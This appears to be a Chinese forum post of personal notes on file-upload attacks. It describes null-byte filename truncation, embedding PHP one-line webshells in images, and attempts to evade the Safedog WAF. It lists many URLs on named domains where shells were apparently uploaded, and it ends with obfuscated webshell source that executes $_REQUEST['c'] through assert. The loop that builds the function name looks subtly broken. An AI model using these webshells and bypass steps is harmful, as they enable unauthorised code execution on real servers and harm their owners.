上传文 测试学习记录
当字符有%00(空字节) 就会被服务器认作为结束符。空字节漏洞存在:
PHP 不同版本存在这个漏洞;
不同函数也存在这个漏洞;例如 转码 urldecode()
图片上传基本流程:
1.图片是否正常上传;
2.图片上传内容是否被感染(内容替换)
3.上传的域名是否是目标服务器;
3.1 如果不是那么判断图片服务器是否解析(php,asp....)
4.上传的目录是否支持解析(php aspx jsp cfm ---)
解释3与4: 所谓解析 就是判断目标服务器是否存在相应的代码运行环境
文件截断上传
走一遍视频后总结:
目标:上传的文件尾缀为.php 的 可运行文件 ;
前提条件:
1. 把图片右击用记事本打开,把PHP 一句话木马代码塞进去 再保存 ;
2. 文件成功上传 ;
3. 把上传的图片另存为存下来,再用编辑器打开, 看代码在不在【也就是被没被感染】,在就继续倒腾下面的
手段:黑盒测试中,利用
1. 修改文件名: a.php%00.jpg、 a.php .jpg、 a.jpg%00.php 、 a.jpg .php
2. 修改hash 值: 把指定位置改成00 [可结合1 尝试]
获得图片路径
http://www.huake94.top/da/data/attachment/forum/201905/27/225026svvnhvyvwsdnudpc.png【这是上传到 下面是ftp上传到】
http://www.huake94.top/da/data/attachment/forum/201905/27/5.png[小图模式 <是?的链接]
http://www.huake94.top/da/data/attachment/forum/201905/27/7.png[< 直议模式 图模式]
http://www.huake94.top/da/data/attachment/forum/201905/27/52.php[小图模式 <是?的链接 的PHP版本]
http://www.huake94.top/da/data/attachment/forum/201905/27/72.php【直接把7改成了php 文件】
http://www.huake94.top/da/data/attachment/forum/201905/27/2.php【直接连接】
实际情况 ,在我链接的时候 提示: 服务器连接被重置; 反应为 安全狗
参考资料: http://www.360doc.com/content/18/0213/19/30583588_729816778.shtml
// 上述失败 采用变量方式 再尝试绕过PHP
采用第二种方式
一句话木马未改动版图片
http://a.wangjingting.top/upload/image/20190116/2.php[小图模式 <是?的链接]
http://a.wangjingting.top/upload/image/20190116/7.png[小图模式 <是?的链接]
http://a.wangjingting.top/upload/image/20190116/5.png[< 直议模式 图模式]
http://a.wangjingting.top/upload/image/20190116/52.php [小图模式 <是?的链接 的PHP版本]
http://a.wangjingting.top/upload/image/20190116/72.php【直接把7改成了php 文件】
一句话木马 变量版 地址 【上述地址全部玩完,经检测 发现该变量版不行 倒是 7.png 可以访问, 特点: 被告该处了< 括号而不是编码?】
http://www.huake94.top/da/data/attachment/forum/201905/27/8.php【直接连接】
http://www.huake94.top/da/data/attachment/forum/201905/27/48.php【图片名称改掉】
http://www.huake94.top/da/data/attachment/forum/201905/27/48.png【直接是图片】
我的主机版
http://a.wangjingting.top/upload/image/20190116/8.php【直接连接】
http://a.wangjingting.top/upload/image/20190116/48.php【图片名称改掉】
http://a.wangjingting.top/upload/image/20190116/48.png【直接是图片】
参考文献: https://blog.csdn.net/cic10235/article/details/52104010【变量木马的制作 尝试绕过安全狗】
选用第三种 来自乌云的 一句话木马去你奶奶个腿版 6.PHP
参考文献:https://www.secpulse.com/archives/38355.html
生成文件并上传:
http://a.wangjingting.top/upload/image/20190116/6.php【直接连接】
http://a.wangjingting.top/upload/image/20190116/46.php【图片名称改掉】
http://a.wangjingting.top/upload/image/20190116/46.png【直接是图片】
再次寻找 可以 过安全的一句话木马 https://www.freebuf.com/articles/web/125084.html 【这个是木马上传方式的整体思路】
木马链接位置: http://a.wangjingting.top/upload/image/20190117/m.php
【
选用的语句4:
<?php
/*
PHP一句话木马
assert($string)
*/
$arr = array('a','s','s','e','r','t');
$func = '';
for($i=0;$i<count($arr);$i++) {
$func .= $func . $arr[$i];
}
$func($_REQUEST['c']);
?>
】
页:
[1]